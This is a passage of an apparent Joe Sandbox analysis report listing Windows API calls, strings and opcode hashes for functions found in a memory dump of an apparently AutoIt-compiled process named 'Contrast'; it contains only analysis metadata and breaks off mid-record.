                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_memmove
                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                                        • Opcode ID: 7a7898f12ded49db6e3e130b002aa7abf73f79a77b0cde8a34888246d59cafe6
                                                                                                                                        • Instruction ID: e1073d188ead41b10cdb8acc6b274c4544c42cf0c0d8d3e1a4b8883dfc9aad90
                                                                                                                                        • Opcode Fuzzy Hash: 7a7898f12ded49db6e3e130b002aa7abf73f79a77b0cde8a34888246d59cafe6
                                                                                                                                        • Instruction Fuzzy Hash: 6611893155056AB9D720A7A1EC5AEFF7F7CFFE2F50F400829B505A20D1EAA01D44C9A1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                                        • Opcode ID: 7a46886b5f8e420949b21ae1beac5edf6cc96e23f2ebfa0f418df9e41a0ebfcb
                                                                                                                                        • Instruction ID: e61a881beb6b584f8c2ef5879ff654f98e09aeca08b5460a8f24ccce864db1c1
                                                                                                                                        • Opcode Fuzzy Hash: 7a46886b5f8e420949b21ae1beac5edf6cc96e23f2ebfa0f418df9e41a0ebfcb
                                                                                                                                        • Instruction Fuzzy Hash: 0E11E43190511AAFCB16AB70AC4EEEA7FBCFF81710F0451A5F00896091EF749D85AF91
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 00575535
                                                                                                                                          • Part of subcall function 00530859: timeGetTime.WINMM(?,00000002,0051C22C), ref: 0053085D
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00575561
                                                                                                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00575585
                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 005755A7
                                                                                                                                        • SetActiveWindow.USER32 ref: 005755C6
                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 005755D4
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 005755F3
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 005755FE
                                                                                                                                        • IsWindow.USER32 ref: 0057560A
                                                                                                                                        • EndDialog.USER32(00000000), ref: 0057561B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                        • String ID: BUTTON
                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                        • Opcode ID: f9c6768e7b6cd0e4bc8fe5f78018a4b7e8f6bd451c7691c4ff41b5d91302f9b7
                                                                                                                                        • Instruction ID: 6ea57253019610e13c48173697b756c8662395bd0c87a616d09035b41d5f7bf7
                                                                                                                                        • Opcode Fuzzy Hash: f9c6768e7b6cd0e4bc8fe5f78018a4b7e8f6bd451c7691c4ff41b5d91302f9b7
                                                                                                                                        • Instruction Fuzzy Hash: C7219FB0206605BFE7605B60FC89E353F6AFB69345F44641AF009821A1EFB19D58FA61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0057DC2D
                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0057DCC0
                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0057DCD4
                                                                                                                                        • CoCreateInstance.OLE32(005A3D4C,00000000,00000001,005CB86C,?), ref: 0057DD20
                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0057DD8F
                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0057DDE7
                                                                                                                                        • _memset.LIBCMT ref: 0057DE24
                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0057DE60
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0057DE83
                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0057DE8A
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0057DEC1
                                                                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0057DEC3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1246142700-0
                                                                                                                                        • Opcode ID: 945b77d99989dc1577d37b07127cdc78680680374cbb8c94efa5a3b3464207a5
                                                                                                                                        • Instruction ID: b954338374542cb8263676cb4a25f9ee8fb92c4a5c7e1cf60c23e3097f8fbcaa
                                                                                                                                        • Opcode Fuzzy Hash: 945b77d99989dc1577d37b07127cdc78680680374cbb8c94efa5a3b3464207a5
                                                                                                                                        • Instruction Fuzzy Hash: 29B1F875A00119AFDB04DFA4D888DAEBBB9FF89304F148459F909EB251DB30EE45DB60
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00570896
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00570901
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00570921
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00570938
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00570967
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00570978
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 005709A4
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 005709B2
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 005709DB
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 005709E9
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00570A12
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00570A20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        • Opcode ID: 897310d6e289d5f931d372bae1cee6221900d69a914e5e491d84c4fae12a55dc
                                                                                                                                        • Instruction ID: ee4037c748085a1465fda36c86a14a4fc65ca8801b667163c03bd429dfa56bad
                                                                                                                                        • Opcode Fuzzy Hash: 897310d6e289d5f931d372bae1cee6221900d69a914e5e491d84c4fae12a55dc
                                                                                                                                        • Instruction Fuzzy Hash: 2D510D3090478469FB34DBB494147EABFF4AF01380F08D59DD5CA571C3DA649A4CEBA6
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0056CE1C
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0056CE2E
                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0056CE8C
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0056CE97
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0056CEA9
                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0056CEFD
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0056CF0B
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0056CF1C
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0056CF5F
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0056CF6D
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0056CF8A
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0056CF97
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                        • Opcode ID: 1ba773dcd6708a1c16e66c784142f151346fc035f40f0f136f9804bf5b945dd6
                                                                                                                                        • Instruction ID: ddc78389cbb67228c5492559dc563c01568c19a04a30eb1f858874090cf3559c
                                                                                                                                        • Opcode Fuzzy Hash: 1ba773dcd6708a1c16e66c784142f151346fc035f40f0f136f9804bf5b945dd6
                                                                                                                                        • Instruction Fuzzy Hash: AE513C71B10205AFDF18CFA9CD99AAEBBBAFB98710F148129F516D72D0D770AD048B50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 005125AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                        • Opcode ID: 15ff37c5193665aef34c943ba7ff95918a9667e7f8204d6d4be52e7a51a09741
                                                                                                                                        • Instruction ID: 1e39aa40ffd49e14694e49c6e33ba680120864a3f54435e5d2afb0b773f6fc23
                                                                                                                                        • Opcode Fuzzy Hash: 15ff37c5193665aef34c943ba7ff95918a9667e7f8204d6d4be52e7a51a09741
                                                                                                                                        • Instruction Fuzzy Hash: CD41E630005144AFEB245F289C88BF93F66FB5A335F154265FDA68A1E1DB708C91EB25
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00522A3E,?,00008000), ref: 00530BA7
                                                                                                                                          • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00522C2C
                                                                                                                                          • Part of subcall function 00523EBE: _wcscpy.LIBCMT ref: 00523EF6
                                                                                                                                          • Part of subcall function 0053386D: _iswctype.LIBCMT ref: 00533875
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                        • API String ID: 537147316-3738523708
                                                                                                                                        • Opcode ID: b4e8cda426c8216164d9a7a0cc0394ab1ec9af11c8f72e3deb7e87db263f5e3a
                                                                                                                                        • Instruction ID: 477cebc82c2892596d67f95269100fe7489442b3cb5494d2d38e27ed4c20b614
                                                                                                                                        • Opcode Fuzzy Hash: b4e8cda426c8216164d9a7a0cc0394ab1ec9af11c8f72e3deb7e87db263f5e3a
                                                                                                                                        • Instruction Fuzzy Hash: 4F028D30108352AFC724EF24D855AAFBFE5BFD6314F10491EF499932A2DB309A49CB52
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                        • API String ID: 421087845-2263619337
                                                                                                                                        • Opcode ID: c2efd1b54bf5b6b504eb5c1a756fc1364ab05f3d447ddb2e1a5a4a780ce29e93
                                                                                                                                        • Instruction ID: cfe1b85d03695dbc522e77154e210a02cbf657b420d017cd08f4a3ba84d597dc
                                                                                                                                        • Opcode Fuzzy Hash: c2efd1b54bf5b6b504eb5c1a756fc1364ab05f3d447ddb2e1a5a4a780ce29e93
                                                                                                                                        • Instruction Fuzzy Hash: 4241D67150460AAFEF24DF74D846EBA7BF8FF45304F20486EE149D7291EA719941CB21
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0059778F
                                                                                                                                        • CreateMenu.USER32 ref: 005977AA
                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 005977B9
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597846
                                                                                                                                        • IsMenu.USER32(?), ref: 0059785C
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00597866
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00597893
                                                                                                                                        • DrawMenuBar.USER32 ref: 0059789B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                        • String ID: 0$F
                                                                                                                                        • API String ID: 176399719-3044882817
                                                                                                                                        • Opcode ID: f79a6360259b65c7e911e67a8d17b3243dafe62d2bdb3579a6f7aa6b07dae601
                                                                                                                                        • Instruction ID: e4d82a5e9163e37288d23b05029dc6c752aa39d0401717223f94c02c59137766
                                                                                                                                        • Opcode Fuzzy Hash: f79a6360259b65c7e911e67a8d17b3243dafe62d2bdb3579a6f7aa6b07dae601
                                                                                                                                        • Instruction Fuzzy Hash: BE413875A11209EFDB20DF64D888AAA7BF9FF5E310F14442AE945A73A0E730A914DF50
                                                                                                                                        APIs
                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00597B83
                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00597B8A
                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00597B9D
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00597BA5
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00597BB0
                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00597BB9
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00597BC3
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00597BD7
                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00597BE3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                        • Opcode ID: 18db2bcb648e1b6f8d79783d26d647bad71d464dd20726619e5ab8cf37649928
                                                                                                                                        • Instruction ID: 40edbd972e93846d5b8d490f4a4eacb4c640a64cc31f8719dec21df0bb04c33d
                                                                                                                                        • Opcode Fuzzy Hash: 18db2bcb648e1b6f8d79783d26d647bad71d464dd20726619e5ab8cf37649928
                                                                                                                                        • Instruction Fuzzy Hash: 75317832114219ABDF119F64DC49FDB3F6AFF1E320F101216FA15A21E0D7319824EBA4
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0053706B
                                                                                                                                          • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00537104
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0053713A
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00537157
                                                                                                                                        • __allrem.LIBCMT ref: 005371AD
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005371C9
                                                                                                                                        • __allrem.LIBCMT ref: 005371E0
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005371FE
                                                                                                                                        • __allrem.LIBCMT ref: 00537215
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00537233
                                                                                                                                        • __invoke_watson.LIBCMT ref: 005372A4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                        • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                        • Instruction ID: 3f6086a9d42ec4a6f8d21e9bef275d5f6961ad9d020bac363220db186907c546
                                                                                                                                        • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                        • Instruction Fuzzy Hash: DE711BB1E0470BABD7249E79CC85B9BBBA9BF59324F144229F514E7281E770DD408BD0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00572CE9
                                                                                                                                        • GetMenuItemInfoW.USER32(005D7890,000000FF,00000000,00000030), ref: 00572D4A
                                                                                                                                        • SetMenuItemInfoW.USER32(005D7890,00000004,00000000,00000030), ref: 00572D80
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00572D92
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00572DD6
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00572DF2
                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00572E1C
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00572E61
                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00572EA7
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572EBB
                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572EDC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                        • Opcode ID: 266baeefa5de27a31546b0b0195705486690dc818dce8385ac9679b7ddc3ed33
